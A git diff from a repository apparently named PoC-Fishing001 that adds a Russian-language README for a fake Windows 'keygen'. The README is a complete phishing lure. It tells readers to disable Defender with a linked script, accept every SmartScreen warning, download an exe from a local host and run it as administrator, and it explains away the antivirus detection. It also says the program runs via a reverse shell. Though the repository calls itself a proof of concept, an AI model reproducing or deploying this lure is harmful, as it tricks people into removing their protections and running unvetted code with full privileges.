diff --git a/README.SOC.md b/README.SOC.md new file mode 100644 index 0000000..152dd30 --- /dev/null +++ b/README.SOC.md @@ -0,0 +1,33 @@ +# keygen-PoC.bat + +Программа предназначена для разблокировки некоторых полезных функций Microsoft Windows, которые обычно недоступны из-за лицензионных ограничений. Программа только загружает необходимые файлы, предлагая пользователю самостоятельно активировать полезные настройки. + +**Внимание!!!** В следствие вышеперечисленных особенностей данная программа рассматривается антивирусными программами как содержащее malware. Это обычное поведение такого рода программ. Поэтому программу следует загружать и запускать при отключённой активной антивирусной защите. Скрипт для отключения защиты вы можете загрузить [по этой ссылке: Start Defender Settings](http://file.netip4.ru/PROGS/NIT/RestoreFoldersScripts/download_01.html) + +## Требования к системе + +для запуска программы. + +- Операционная система — Microsoft Windows 7, 8.1, 10, 11 или Microsoft Windows Server 2012R2, 2016-2025. Редакции Windows Server Core программа не поддерживает или поддерживает ограниченно. +- Архитектура операционной системы — amd64. +- Язык установки операционной ситемы — русский/английский. +- Учётная запись пользователя, из-под которой осуществляется запуск программы, должна иметь возможность повышения привилегий до уровня администратора системы. +- Для инициализации переменных окружения в эту учётную запись пользователь должен войти хотя бы раз в графическом интерфейсе (на физическком локальном компьютере или с помощью RDP). Загрузка и выполнение программы может осуществляться также в командной строке и Reverse Shell при выполнении этих условий. +- Не рекомендуется запускать данную программу от имени встроенной учётной записи локального администратора или администратора домена. + +## Download link + +Ссылка на загрузку предварительноной версии программы (PoC): + +- [keygen-poc - 1.0.0.0-alpha1](http://raspberrypi:3002/admin/PoC-Fishing001/releases/download/1.0.0.0-alpha1/keygen-poc.exe) + +## Установка + +- Загрузите программу отключения активной антивирусной защиты Microsoft Windows defender, как указано [здесь](http://file.netip4.ru/PROGS/NIT/RestoreFoldersScripts/download_01.html). +- После отключения активной антивирусной защиты загрузите файл по ссылке в папку «Загрузки» текущего пользователя, и разблокируйте его. +- *Примечание*. Не смотря на отключёный антивирус, фильтр SmartScreen Windows Defender будет все равно выдавать предупреждения и мешать загрузке файла. Отвечайте на все запросы о загрузке и сохранении файла утвердительно. +- Откройте папку с загруженым файлом. +- Щёлкните на файле правой клавишей мыши, и выберите пункт: «Запуск от имени администратора». Подтвердите запуск в окне UAC. +- Через некоторое время на компьютере покажутся диалоговоые окна с сообщениями. Это нормальное поведение PoC alpha версии. +- После закрытия окна в папке «Загрзки» текущего пользователя появятся файлы. Что с ними делать — смотри дополнительные инструкции. +- *Примечание*. Данная программа только загружает, но не исполняет и не выдаёт паролей на запуск файлов в Microsoft Windows. Её «вредоносная активность» объясняется использованием компилятора BAT2EXE для создания файлов. \ No newline at end of file diff --git a/README.md b/README.md index aea8cdc..6475f22 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ # PoC-Fishing001 -Proof of Concept программы для распространения мисконфиов методом фишинга +Proof of Concept программы для распространения мисконфигов методом фишинга ## Описание @@ -14,3 +14,4 @@ Proof of Concept программы для распространения мис При своей загрузке и установке в командной строке программа требует, чтобы пользователь хотя бы раз зашёл в профиль пользователя в графическом интерфейсе. Это действие необходимо для инициализации переменных окружения. По-видимому, система не работает в среде Windows Server Core. +